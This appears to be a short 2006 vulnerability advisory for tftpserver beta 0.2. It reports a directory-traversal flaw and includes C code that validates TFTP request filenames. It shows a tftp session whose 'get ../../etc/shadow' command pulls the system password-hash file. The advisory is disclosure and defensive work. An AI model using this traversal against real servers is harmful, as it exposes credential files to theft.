======tftpserver dot dot vulnerability====== //3/24/2006//

http://sourceforge.net/projects/tftp-server/

From the README:

"This server is a Multithreaded TFTP Server based on Trivial File Transfer Protocol and is normally used for PXE Boot or other Network Boots. It supports advance options like tsize, blksize and interval.

This is second beta Linux Release 0.2"

tftpserver beta 0.2 is vulnerable to directory traversal (the ../ bug) because it does not sanitize user input: a requested filename containing ../ is accepted as-is.

<code>
root@pangea:/home/done/tftpserver# tftp 192.168.0.26
tftp> get ../../etc/shadow
Received 652 bytes in 0.0 seconds
tftp> quit
root@debian:/home/done/tftpserver# head shadow
root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::
</code>
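The missing check, as an added example (not code from tftpserver): it pulls the filename out of a read/write request laid out as in RFC 1350 and refuses absolute paths and any ".." component before the name reaches open(). The function names are hypothetical and the packet is constructed; the check is lexical only, so a server should still confine itself to its served directory (for example with chroot) to cover symlinks.

```c
#include <stdio.h>
#include <string.h>

/* Return 1 if name is a relative path with no ".." component, else 0. */
static int name_is_safe(const char *name)
{
    if (name[0] == '\0' || name[0] == '/' || name[0] == '\\')
        return 0;                        /* empty or absolute path */
    while (*name) {
        size_t n = strcspn(name, "/\\"); /* length of this component */
        if (n == 2 && name[0] == '.' && name[1] == '.')
            return 0;                    /* ".." climbs out of the root */
        name += n;
        if (*name) name++;               /* skip the separator */
    }
    return 1;
}

/*
 * TFTP RRQ/WRQ layout (RFC 1350):
 *   2-byte opcode (1 = RRQ, 2 = WRQ) | filename | 0 | mode | 0
 * Returns the filename inside pkt if well-formed and safe, else NULL.
 */
const char *tftp_checked_filename(const unsigned char *pkt, size_t len)
{
    if (len < 4 || pkt[0] != 0 || (pkt[1] != 1 && pkt[1] != 2))
        return NULL;                     /* too short or not RRQ/WRQ */
    const char *name = (const char *)pkt + 2;
    if (memchr(name, '\0', len - 2) == NULL)
        return NULL;                     /* filename not terminated in packet */
    return name_is_safe(name) ? name : NULL;
}

int main(void)
{
    /* Constructed RRQ carrying the filename from the session above. */
    static const unsigned char rrq[] = "\0\1../../etc/shadow\0octet";
    const char *name = tftp_checked_filename(rrq, sizeof rrq);
    printf("%s\n", name ? name : "rejected");
    return 0;
}
```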